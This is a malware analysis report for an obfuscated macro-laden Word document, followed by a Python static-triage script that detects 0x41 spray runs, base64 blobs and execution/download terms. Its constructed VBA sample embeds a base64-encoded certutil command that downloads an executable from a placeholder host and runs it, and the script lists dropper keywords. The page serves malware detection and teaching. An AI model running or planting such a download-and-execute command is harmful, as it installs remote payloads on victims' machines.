Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 cc0f6df49467f7dc…

MALICIOUS

Office (OLE) / .DOC

Size: 12.0 KB  First seen: 2022-11-25
MD5: eafa56496cc62ea0206d492cb09af12e
SHA-1: b6c16bd2726fd88308a2c355988ea6a3641d1e69
SHA-256: cc0f6df49467f7dc565faeb3f74bb6bf7dd0cc285304adc3becf343316730537
Risk score: 62

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic

The document carries VBA macros, and a heap-spray heuristic also fired; together these indicate malicious intent. The VBA macro code is heavily obfuscated, but its structure suggests it is designed to download and execute a secondary payload. The heap-spray heuristic rests on a run of repeated 0x41 bytes, which is also what padding or string obfuscation looks like, so it should be read as a weak corroborating signal rather than evidence of an exploit; the macro itself is the stronger indicator. Dynamic analysis or manual deobfuscation of the macro is required to determine the exact nature and source of the payload.

Heuristics (3)

  • Heap-spray pattern detected (severity: high, SC_HEAP_SPRAY)
    Repeated 0x41 ('A') bytes found
  • VBA macros detected (severity: medium, OLE_VBA_MACROS)
    Document contains VBA macro code
  • Suspicious extracted artifact (severity: info, EXTRACTED_FILE_STATIC_TRIAGE)
    One or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
SHA-256: 24a0fe488effc6a2a0400044dc83c7b5923f93faf1f10f3f081997eda7a92e61
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12289 bytes
Detection
ClamAV: No threats found (a signature miss on obfuscated VBA is expected and does not lower the verdict)
Obfuscation or payload: likely
Carved artifact contains 1 long base64-like blob(s); decoding the blob and rescanning it for execution/download terms is the next triage step.
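The checks behind the three heuristics above and the base64-blob finding on the carved macro can be reproduced offline with the standard library alone. The script below is an added example written for this page, not the analysis platform's own code and not the macro from this report: it runs over a constructed VBA module in the shape olevba emits, measures the longest run of 0x41 bytes (the SC_HEAP_SPRAY signal), finds long base64-like blobs, decodes them, and scans both the source and the decoded blobs for execution/download terms. The thresholds (128-byte run, 40-character blob, 16 distinct characters), the term list and the `Decode` helper named inside the sample macro are assumptions for illustration. It also shows the edge case the report's heap-spray heuristic touches: a run of 'A' is valid base64 alphabet, so a blob check that does not look at character diversity would count the padding as a second payload.

```python
import base64
import re
from typing import Dict, List

# Long runs of base64 alphabet; '=' padding optional.
BASE64_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")

# Execution/download terms typical of macro droppers (assumed list, case-insensitive).
EXEC_TERMS = ("CreateObject", "WScript.Shell", ".Run", "Shell(", "URLDownloadToFile",
              "XMLHTTP", "powershell", "certutil", "http://", "https://", "Environ(")


def longest_byte_run(data: bytes, value: int = 0x41) -> int:
    """Length of the longest run of one byte value (0x41 = 'A' by default)."""
    pat = re.compile(re.escape(bytes([value])) + b"+")
    return max((m.end() - m.start() for m in pat.finditer(data)), default=0)


def plausible_base64(token: str, min_distinct: int = 16) -> bool:
    """True only for tokens that decode cleanly AND are not one repeated character:
    padding or spray bytes such as 'AAAA...' are valid base64 alphabet but carry
    no payload, so they are rejected on character diversity."""
    if len(token) % 4 or len(set(token)) < min_distinct:
        return False
    try:
        base64.b64decode(token, validate=True)
    except ValueError:  # binascii.Error is a ValueError subclass
        return False
    return True


def find_base64_blobs(text: str) -> List[bytes]:
    """Decoded bytes of every plausible base64 blob in the VBA source."""
    return [base64.b64decode(m.group(0)) for m in BASE64_RE.finditer(text)
            if plausible_base64(m.group(0))]


def find_exec_terms(text: str) -> List[str]:
    low = text.lower()
    return sorted(t for t in EXEC_TERMS if t.lower() in low)


def triage_macro(raw: bytes, spray_min_run: int = 128) -> Dict[str, object]:
    """Static triage of a decoded VBA module, mirroring the report's checks:
    repeated-0x41 run (SC_HEAP_SPRAY), long base64 blobs, and execution/download
    terms in the source and inside the decoded blobs."""
    text = raw.decode("latin-1")
    blobs = find_base64_blobs(text)
    decoded_text = "\n".join(b.decode("latin-1") for b in blobs)
    run = longest_byte_run(raw, 0x41)
    heuristics = []
    if run >= spray_min_run:
        heuristics.append("SC_HEAP_SPRAY")
    if blobs or find_exec_terms(text):
        heuristics.append("EXTRACTED_FILE_STATIC_TRIAGE")
    return {
        "longest_0x41_run": run,
        "base64_blobs": len(blobs),
        "terms_in_source": find_exec_terms(text),
        "terms_in_decoded_blobs": find_exec_terms(decoded_text),
        "heuristics": heuristics,
    }


# Constructed sample (NOT the macro from this report): a VBA module in the shape
# olevba emits, with a 256-byte run of 'A' and a base64-wrapped download command.
_PAYLOAD = (b"cmd.exe /c certutil -urlcache -split -f "
            b"http://example.invalid/p.bin %TEMP%\\p.exe & %TEMP%\\p.exe")
SAMPLE_VBA = (
    'Attribute VB_Name = "ThisDocument"\n'
    "Private Sub Document_Open()\n"
    '    Dim pad As String: pad = "' + "A" * 256 + '"\n'
    '    Dim s As String: s = "' + base64.b64encode(_PAYLOAD).decode() + '"\n'
    "    Dim o As Object\n"
    '    Set o = CreateObject("WScript.Shell")\n'
    "    o.Run Decode(s), 0\n"  # Decode is an assumed in-macro helper
    "End Sub\n"
).encode("latin-1")


if __name__ == "__main__":
    for key, value in triage_macro(SAMPLE_VBA).items():
        print(f"{key}: {value}")
```

On the constructed sample the padding string drives the 0x41 run to 256 and trips the spray heuristic, but the diversity check keeps it out of the blob count, so exactly one blob is reported; decoding that blob surfaces `certutil` and an `http://` URL that never appear in the source text. The same loop applies unchanged to a real `macros.bas` read from disk in binary mode.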